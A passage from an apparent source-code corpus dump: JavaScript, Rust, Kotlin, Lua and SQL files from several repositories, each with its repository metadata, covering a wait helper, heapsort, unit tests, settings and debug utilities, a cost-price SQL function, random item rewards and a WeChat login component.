WaitFor.prototype.check = function (element, cb, maxTime) {
var self = this;
var executeArgs = [element];
var executeCallback = function (result) {
var now = new Date().getTime();
if (result.value) {
cb(true, now);
} else if (now - self.startTime < maxTime) {
setTimeout(function () {
self.check(element, cb, maxTime);
}, 1000);
} else {
cb(false);
}
};
this.api.execute(function(selector) {
try {
return document.querySelector(selector) && (document.querySelector(selector).readyState == 4);
} catch (err) {
return false;
}
}, executeArgs, executeCallback);
};
module.exports = WaitFor; | 25.1 | 100 | 0.62417 | 3.265625 |
b53a90f7211eb97269aee7a39d15e41a5c2cc47c | 964 | rs | Rust | src/selection_sorts/heapsort.rs | twirrim/rust-sort | 056226632b1a713212b90eeb8a251fa412b4b360 | [
"MIT"
] | null | null | null | src/selection_sorts/heapsort.rs | twirrim/rust-sort | 056226632b1a713212b90eeb8a251fa412b4b360 | [
"MIT"
] | null | null | null | src/selection_sorts/heapsort.rs | twirrim/rust-sort | 056226632b1a713212b90eeb8a251fa412b4b360 | [
"MIT"
] | null | null | null | #[cfg(test)]
mod tests {
use crate::heapsort;
#[test]
fn sort() {
let mut data = vec![5, 4, 3, 2, 1];
heapsort(&mut data);
assert_eq!(data, [1, 2, 3, 4, 5]);
}
}
fn _heapify<T: PartialOrd>(v: &mut [T], mut i: usize) {
let l = v.len();
loop {
let mut parent_idx = i;
let left_child_idx = 2 * i + 1;
let right_child_idx = 2 * i + 2;
if left_child_idx < l && v[left_child_idx] < v[parent_idx] {
parent_idx = left_child_idx;
}
if right_child_idx < l && v[right_child_idx] < v[parent_idx] {
parent_idx = right_child_idx;
}
if i == parent_idx {
break;
}
v.swap(i, parent_idx);
i = parent_idx;
}
}
pub fn heapsort<T: PartialOrd>(v: &mut [T]) {
let l = v.len();
for i in (0..(l / 2)).rev() {
_heapify(v, i);
}
for i in 0..l {
_heapify(&mut v[i..], 0);
}
}
| 22.418605 | 70 | 0.477178 | 3.28125 |
18b033c2844b16920f7a0e6cd308a8172fe20c37 | 1,425 | kt | Kotlin | remote/src/test/kotlin/com/androchef/remote/mappers/movies/MovieModelEntityMapperTest.kt | Abdul-Quadri-Ismail/Android-Clean-Architecture | 068912c99ad2cb890be37049f0f208457dbab63c | [
"MIT"
] | 227 | 2020-04-26T09:12:44.000Z | 2022-03-28T03:27:43.000Z | remote/src/test/kotlin/com/androchef/remote/mappers/movies/MovieModelEntityMapperTest.kt | Abdul-Quadri-Ismail/Android-Clean-Architecture | 068912c99ad2cb890be37049f0f208457dbab63c | [
"MIT"
] | 1 | 2021-01-09T13:39:38.000Z | 2021-01-09T19:36:09.000Z | remote/src/test/kotlin/com/androchef/remote/mappers/movies/MovieModelEntityMapperTest.kt | Abdul-Quadri-Ismail/Android-Clean-Architecture | 068912c99ad2cb890be37049f0f208457dbab63c | [
"MIT"
] | 49 | 2020-04-27T07:33:58.000Z | 2021-12-09T05:08:47.000Z | package com.androchef.remote.mappers.movies
import com.androchef.data.models.MovieEntity
import com.androchef.remote.factory.movies.RemoteMovieFactory
import com.androchef.remote.models.movies.MovieModel
import org.junit.Assert.assertEquals
import org.junit.Before
import org.junit.Test
import org.junit.runner.RunWith
import org.mockito.runners.MockitoJUnitRunner
@RunWith(MockitoJUnitRunner::class)
class MovieModelEntityMapperTest {
private lateinit var movieModelEntityMapper: MovieModelEntityMapper
@Before
fun setUp() {
movieModelEntityMapper = MovieModelEntityMapper()
}
@Test
fun mapFromModel() {
// Arrange
val movieModel = RemoteMovieFactory.generateMovieModel()
// Act
val movieEntity = movieModelEntityMapper.mapFromModel(movieModel)
// Assert
assertMapMovieDataEquals(movieModel, movieEntity)
}
/**
* Helper Methods
*/
private fun assertMapMovieDataEquals(movieModel: MovieModel, movieEntity: MovieEntity) {
assertEquals(movieEntity.isBookMarked, false)
assertEquals(movieEntity.profilePath, movieModel.profilePath)
assertEquals(movieEntity.voteAverage, movieModel.voteAverage)
assertEquals(movieEntity.movieTitle, movieModel.title)
assertEquals(movieEntity.movieName, movieModel.name)
assertEquals(movieEntity.posterPath, movieModel.posterPath)
}
}
| 30.978261 | 92 | 0.750877 | 3 |
491f40bbe37c426879fd118c068500e34a39dd5f | 3,862 | lua | Lua | resources/[race]/race_progress/Settings.lua | AfuSensi/MTA-Resources | e4a0f3981ddc92c8f15c3d93140196c6a8589fa8 | [
"MIT",
"0BSD"
] | 18 | 2018-09-13T14:50:40.000Z | 2022-02-02T21:44:50.000Z | resources/[race]/race_progress/Settings.lua | AfuSensi/MTA-Resources | e4a0f3981ddc92c8f15c3d93140196c6a8589fa8 | [
"MIT",
"0BSD"
] | 151 | 2018-03-08T11:01:42.000Z | 2021-10-05T17:25:05.000Z | resources/[race]/race_progress/Settings.lua | AfuSensi/MTA-Resources | e4a0f3981ddc92c8f15c3d93140196c6a8589fa8 | [
"MIT",
"0BSD"
] | 111 | 2018-03-08T10:53:00.000Z | 2022-03-12T18:54:54.000Z | ---
-- Class to manage settings, which can be used in other scripts.
--
-- @author driver2
-- @copyright 2009 driver2
--
-- Changes:
-- 2010-01-30: Commented functions and cleaned up a bit
Settings = {}
---
-- Creates a new object with the default settings and
-- the filename.
--
-- @param table defaultSettings: A table with the default settings
-- @param string filename: The xml file to save the settings to
function Settings:new(defaultSettings,filename)
local object = {}
setmetatable(object,self)
self.__index = self
object.settingsXml = Xml:new(filename,"settings")
object.settings = {}
object.settings.default = defaultSettings
return object
end
---
-- Change a setting to a new value.
--
-- @param string settings: The name of the setting
-- @param mixed value: The value of the setting (should be something that can be saved
-- as a string
-- @param string settingType (optional, defaults to "main"): The type of the setting
function Settings:set(setting,value,settingType)
-- Set default type if parameter was omitted
if settingType == nil then
settingType = "main"
end
-- Retrieve the datatype of the setting by the default setting
local defaultType = type(self.settings.default[setting])
-- Convert according to datatype
if defaultType == "string" then
value = tostring(value)
elseif defaultType == "number" then
value = tonumber(value)
elseif defaultType == "boolean" then
value = toboolean(value)
end
-- If table for this settingtype doesnt exist, create it
if self.settings[settingType] == nil then
self.settings[settingType] = {}
end
-- Set new value to setting
self.settings[settingType][setting] = value
end
---
-- Load settings of this setting type from the XML file
--
-- @param string settingType (optional, defaults to "main"): The setting type
function Settings:loadFromXml(settingType)
-- Set default type if parameter was omitted
if settingType == nil then
settingType = "main"
end
self.settingsXml:open()
-- Loop through default settings and read the values
for k,v in pairs(self.settings.default) do
local value = self.settingsXml:getAttribute("root",k)
if value ~= false and value ~= "" then
self:set(k,value,settingType)
else
self:set(k,v,settingType)
end
end
self.settingsXml:unload()
end
---
-- Save the settings of this setting type to the XML file
--
-- @param string setting (optional, defaults to nil): The name of the setting
-- to save (if omitted, it will save all settings)
-- @param string settingType (optional, defaults to "main"): The setting type
function Settings:saveToXml(setting,settingType)
if settingType == nil then
settingType = "main"
end
self.settingsXml:open()
-- Loop through all settings of this type and save them if
-- they are equal to the setting or if setting is nil.
for k,v in pairs(self.settings[settingType]) do
if setting == nil or setting == k then
self.settingsXml:setAttribute("root",k,v)
end
end
self.settingsXml:save()
self.settingsXml:unload()
end
---
-- Gets a single setting.
--
-- @param string setting: The name of the setting
-- @param string settingType (optional): The type of the setting (default: "main")
function Settings:get(setting,settingType)
-- Retrieve datatype from default settings
datatype = type(self.settings.default[setting])
-- Set default settingtype if parameter was omitted
if settingType == nil then
settingType = "main"
end
local value = nil
-- Get the setting from this setting type if it exists
if (self.settings[settingType] ~= nil) then
value = self.settings[settingType][setting]
end
-- If the datatype of the retrieved value matches the default datatype, everything is ok
if type(value) == datatype then
return value
end
-- If not, return the default value
return self.settings.default[setting]
end
| 29.480916 | 91 | 0.723977 | 3.34375 |
8d70932119fe049ad9138d4db885ecb9c268977c | 1,676 | lua | Lua | debugtool.lua | wcguo/xiuxian | 953cf54b3eea558ee7dee4ec6f161b9a66c137ac | [
"MIT"
] | 1 | 2022-02-23T18:00:08.000Z | 2022-02-23T18:00:08.000Z | debugtool.lua | wcguo/xiuxian | 953cf54b3eea558ee7dee4ec6f161b9a66c137ac | [
"MIT"
] | null | null | null | debugtool.lua | wcguo/xiuxian | 953cf54b3eea558ee7dee4ec6f161b9a66c137ac | [
"MIT"
] | 1 | 2022-03-08T17:23:06.000Z | 2022-03-08T17:23:06.000Z | local debug_util = {}
debug_util.debug_mode = true
debug_log = debug_util.debug_mode and log or function()
end
---- 序列化
--print( serpent.dump( aTable ) ) -- 完整序列化
--print( serpent.line( aTable ) ) -- 转换为 1 行 , 没有自引用
--print( serpent.block( aTable ) ) -- 转换为多行 , 没有自引用
function debug_util.info(obj)
if not debug_util.debug_mode then
return
end
debug_log("------------xiuxian info------------------")
debug_log(serpent.block(obj))
debug_log("------------xiuxian info end--------------")
end
function debug_util.tojson(obj, level)
level = level or 1
local levelSpace = ""
for i = 1, level, 1 do
levelSpace = levelSpace .. " "
end
local size = 1
local maxSize = table_size(obj)
local s = level == 1 and "\n{" or "{"
for k, v in pairs(obj) do
s = s .. "\n" .. levelSpace .. (type(k) == "number" and "" or (tostring(k) .. " : "))
local dataType = type(v)
if dataType == "table" then
s = s ..dataType --debug_util.tojson(v, level + 1)
elseif dataType == "string" then
s = s .. "\"" .. v .. "\""
else
s = s .. tostring(v)
end
if size < maxSize then
s = s .. " ,"
end
size = size + 1
end
s = s .. "\n"
for i = 1, level - 1, 1 do
s = s .. " "
end
return s .. "}"
end
function debug_util.infoless(obj, level)
if not debug_util.debug_mode then
return
end
debug_log("------------xiuxian info------------------")
debug_log(debug_util.tojson(obj, level))
debug_log("------------xiuxian info end--------------")
end
return debug_util
| 23.942857 | 93 | 0.517303 | 3.1875 |
f7e9a9b08517c3b14fb2705c904f3abed9341ce4 | 931 | sql | SQL | backend/de.metas.adempiere.adempiere/migration/src/main/sql/postgresql/ddl/public/functions/getCostPrice.sql | dram/metasfresh | a1b881a5b7df8b108d4c4ac03082b72c323873eb | [
"RSA-MD"
] | 1,144 | 2016-02-14T10:29:35.000Z | 2022-03-30T09:50:41.000Z | backend/de.metas.adempiere.adempiere/migration/src/main/sql/postgresql/ddl/public/functions/getCostPrice.sql | vestigegroup/metasfresh | 4b2d48c091fb2a73e6f186260a06c715f5e2fe96 | [
"RSA-MD"
] | 8,283 | 2016-04-28T17:41:34.000Z | 2022-03-30T13:30:12.000Z | backend/de.metas.adempiere.adempiere/migration/src/main/sql/postgresql/ddl/public/functions/getCostPrice.sql | vestigegroup/metasfresh | 4b2d48c091fb2a73e6f186260a06c715f5e2fe96 | [
"RSA-MD"
] | 441 | 2016-04-29T08:06:07.000Z | 2022-03-28T06:09:56.000Z | -- DROP FUNCTION getCostPrice(numeric, numeric, numeric);
CREATE OR REPLACE FUNCTION getCostPrice
(
p_M_Product_ID numeric,
p_AD_Client_ID numeric,
p_AD_Org_ID numeric
)
RETURNS numeric
AS
$BODY$
SELECT COALESCE(sum(cost.CurrentCostPrice), 0)
FROM M_Cost cost
INNER JOIN C_AcctSchema acs on acs.C_AcctSchema_ID=cost.C_AcctSchema_ID
INNER JOIN M_CostElement ce on cost.M_CostElement_ID = ce.M_CostElement_ID
WHERE cost.M_Product_ID = p_M_Product_ID
AND cost.AD_Client_ID = p_AD_Client_ID
AND cost.AD_Org_ID = p_AD_Org_ID
AND cost.C_AcctSchema_ID = (select ci.C_AcctSchema1_ID from AD_ClientInfo ci where ci.AD_Client_ID = p_AD_Client_ID)
AND ce.CostingMethod = acs.CostingMethod
--
UNION ALL
(
SELECT 0
)
LIMIT 1
$BODY$
LANGUAGE sql STABLE
;
COMMENT ON FUNCTION getCostPrice(numeric, numeric, numeric) IS
' -- TEST :
SELECT M_Product_ID, getCostPrice(M_Product_ID, 1000000, 1000000) from M_Product; '
; | 25.861111 | 117 | 0.787325 | 3.0625 |
652cc5a124cb82089fec9b806d9345c58673911c | 7,292 | rs | Rust | src/clash/progression/gambler.rs | chamons/ArenaGS | 0d3c8d4ebc818198b21a8c99dc853286cc16b7c2 | [
"MIT"
] | null | null | null | src/clash/progression/gambler.rs | chamons/ArenaGS | 0d3c8d4ebc818198b21a8c99dc853286cc16b7c2 | [
"MIT"
] | 126 | 2017-05-14T19:41:31.000Z | 2020-11-24T15:53:49.000Z | src/clash/progression/gambler.rs | chamons/ArenaGS | 0d3c8d4ebc818198b21a8c99dc853286cc16b7c2 | [
"MIT"
] | null | null | null | use std::cmp;
use std::collections::HashMap;
use rand::prelude::*;
use specs::prelude::*;
use super::super::*;
pub fn get_reward_request(ecs: &World, count: u32) -> Vec<(EquipmentRarity, u32)> {
let mut rng = ecs.write_resource::<RandomComponent>();
let choices = vec![EquipmentRarity::Common, EquipmentRarity::Uncommon, EquipmentRarity::Rare];
let mut requests = HashMap::new();
let mut add_request = |kind: EquipmentRarity| *requests.entry(kind).or_insert(0) += 1;
for _ in 0..count {
add_request(
*choices
.choose_weighted(&mut rng.rand, |i| match i {
EquipmentRarity::Common => 75,
EquipmentRarity::Uncommon => 15,
EquipmentRarity::Rare => 10,
EquipmentRarity::Standard => 0,
})
.unwrap(),
);
}
requests.iter().map(|x| (*x.0, *x.1)).collect()
}
pub fn get_merchant_items(ecs: &World) -> Vec<EquipmentItem> {
get_random_items(
ecs,
vec![(EquipmentRarity::Rare, 1), (EquipmentRarity::Uncommon, 2), (EquipmentRarity::Common, 5)],
)
}
pub fn get_random_items(ecs: &World, requests: Vec<(EquipmentRarity, u32)>) -> Vec<EquipmentItem> {
let equipment = ecs.read_resource::<EquipmentResource>();
let progression = ecs.read_resource::<ProgressionComponent>();
let available: Vec<&EquipmentItem> = equipment.all().filter(|e| !progression.state.items.contains(&e.name)).collect();
let rare: Vec<&EquipmentItem> = available.iter().filter(|e| e.rarity == EquipmentRarity::Rare).copied().collect();
let uncommon: Vec<&EquipmentItem> = available.iter().filter(|e| e.rarity == EquipmentRarity::Uncommon).copied().collect();
let common: Vec<&EquipmentItem> = available.iter().filter(|&e| e.rarity == EquipmentRarity::Common).copied().collect();
let rare_request_count: u32 = requests.iter().filter(|r| r.0 == EquipmentRarity::Rare).map(|r| r.1).sum();
let mut uncommon_request_count: u32 = requests.iter().filter(|r| r.0 == EquipmentRarity::Uncommon).map(|r| r.1).sum();
let mut common_request_count: u32 = requests.iter().filter(|r| r.0 == EquipmentRarity::Common).map(|r| r.1).sum();
let rare_count = cmp::min(rare_request_count, rare.len() as u32);
if rare_count < rare_request_count {
uncommon_request_count += rare_request_count - rare_count;
}
let uncommon_count = cmp::min(uncommon_request_count, uncommon.len() as u32);
if uncommon_count < uncommon_request_count {
common_request_count += uncommon_request_count - uncommon_count;
}
let common_count = cmp::min(common_request_count, common.len() as u32);
let mut rng = ecs.write_resource::<RandomComponent>();
let mut chosen = Vec::with_capacity((rare_request_count + uncommon_request_count + common_request_count) as usize);
chosen.extend(rare.choose_multiple(&mut rng.rand, rare_count as usize).map(|&e| e.clone()));
chosen.extend(uncommon.choose_multiple(&mut rng.rand, uncommon_count as usize).map(|&e| e.clone()));
chosen.extend(common.choose_multiple(&mut rng.rand, common_count as usize).map(|&e| e.clone()));
// Reverse so rare at end
chosen.reverse();
chosen
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn selects_items() {
let mut ecs = World::new();
let equipments = EquipmentResource::init_with(&[
EquipmentItem::init("a", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("b", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("c", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("d", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
]);
let progression = ProgressionComponent::init(ProgressionState::init(0, 0, &["a"], CharacterWeaponKind::Gunslinger, Equipment::init_empty()));
ecs.insert(RandomComponent::init());
ecs.insert(progression);
ecs.insert(equipments);
for _ in 0..10 {
let chosen = get_random_items(&ecs, vec![(EquipmentRarity::Common, 2)]);
assert_eq!(2, chosen.len());
assert!(chosen.iter().all(|c| c.name == "b" || c.name == "c" || c.name == "d"));
}
}
#[test]
fn downgrades_when_too_few() {
let mut ecs = World::new();
let equipments = EquipmentResource::init_with(&[
EquipmentItem::init("a", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("b", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("c", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("d", None, EquipmentKinds::Accessory, EquipmentRarity::Uncommon, &[EquipmentEffect::None]),
EquipmentItem::init("e", None, EquipmentKinds::Accessory, EquipmentRarity::Uncommon, &[EquipmentEffect::None]),
EquipmentItem::init("f", None, EquipmentKinds::Accessory, EquipmentRarity::Rare, &[EquipmentEffect::None]),
]);
let progression = ProgressionComponent::init(ProgressionState::init(0, 0, &["a"], CharacterWeaponKind::Gunslinger, Equipment::init_empty()));
ecs.insert(RandomComponent::init());
ecs.insert(progression);
ecs.insert(equipments);
for _ in 0..10 {
let chosen = get_random_items(
&ecs,
vec![(EquipmentRarity::Common, 2), (EquipmentRarity::Uncommon, 2), (EquipmentRarity::Rare, 2)],
);
assert_eq!(5, chosen.len());
assert!(chosen.iter().all(|c| c.name != "a"));
}
}
#[test]
fn too_few_total_items() {
let mut ecs = World::new();
let equipments = EquipmentResource::init_with(&[
EquipmentItem::init("a", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("b", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
EquipmentItem::init("c", None, EquipmentKinds::Accessory, EquipmentRarity::Common, &[EquipmentEffect::None]),
]);
let progression = ProgressionComponent::init(ProgressionState::init(0, 0, &["a"], CharacterWeaponKind::Gunslinger, Equipment::init_empty()));
ecs.insert(RandomComponent::init());
ecs.insert(progression);
ecs.insert(equipments);
for _ in 0..10 {
let chosen = get_random_items(
&ecs,
vec![(EquipmentRarity::Common, 12), (EquipmentRarity::Uncommon, 2), (EquipmentRarity::Rare, 2)],
);
assert_eq!(2, chosen.len());
assert!(chosen.iter().all(|c| c.name != "a"));
}
}
#[test]
fn random_reward() {
let mut ecs = World::new();
ecs.insert(RandomComponent::init());
let request = get_reward_request(&ecs, 3);
assert_eq!(3, request.iter().map(|r| r.1).sum::<u32>());
}
}
| 43.147929 | 149 | 0.629868 | 3.171875 |
040e190e0368ecd734725045a8016a6c9dab78fc | 2,581 | js | JavaScript | components/author/author.js | linmujing/lvyingWeChat | 2fc8632b5bcee5d21196eee8eec54b1f5defa790 | [
"Apache-2.0"
] | null | null | null | components/author/author.js | linmujing/lvyingWeChat | 2fc8632b5bcee5d21196eee8eec54b1f5defa790 | [
"Apache-2.0"
] | null | null | null | components/author/author.js | linmujing/lvyingWeChat | 2fc8632b5bcee5d21196eee8eec54b1f5defa790 | [
"Apache-2.0"
] | null | null | null | // components/mydist/author.js
var app = getApp();
Component({
/**
* 组件的属性列表
*/
properties: {
},
/**
* 组件的初始数据
*/
data: {
// 组件显示
authorShow: true
},
ready(){
},
/**
* 组件的方法列表
*/
methods: {
// 获取用户信息
onGotUserInfo(res) {
console.log(res)
wx.showLoading({ title: '获取授权中...', mask: true })
let that = this;
// 小程序接口参数
let url = app.GO.api + 'wechat/login/mp/customer/userInfo';
let param = {
encryptedData: res.detail.encryptedData,
iv: res.detail.iv
};
//调用登录接口
wx.login({
success: function (res) {
// wx.showModal({
// title: '1',
// content: JSON.stringify(res),
// })
console.log(res)
param.code = res.code;
wx.request({
url: url,
method: 'get',
data: param,
success: function (res) {
// wx.showModal({
// title: '2',
// content: JSON.stringify(res),
// })
wx.hideLoading()
console.log(res.data)
let data = res.data;
if(data.code == 200){
wx.setStorageSync('recommend_customer_id', data.content.ciCode);
wx.setStorageSync('recommend_customer_name', data.content.ciName);
wx.setStorageSync('recommend_customer_phone', data.content.ciPhone);
wx.setStorageSync('recommend_customer_img', data.content.ciProfileUrl);
wx.setStorageSync('unionLongId', data.content.unionLongId);
//鉴权
app.GO.util.getStorageData(app);
wx.showToast({ title: '获取授权成功!' })
setTimeout(() => { wx.navigateBack() },500);
}else{
wx.showToast({ title: '获取授权失败!' , 'icon':'none'})
}
},
fail: function (err) {
// wx.showModal({
// title: '3',
// content: JSON.stringify(err),
// })
wx.hideLoading()
wx.showToast({ title: '获取授权失败,请重新检查网络是否正常!', icon: 'none' })
}
})
},
fail: function (res) {
// wx.showModal({
// title: '4',
// content: JSON.stringify(res),
// })
wx.hideLoading()
wx.showToast({ title: '获取授权失败,请重新检查网络是否正常!', icon: 'none' })
}
})
},
}
})
| 24.349057 | 88 | 0.444789 | 3.078125 |
Subsets and Splits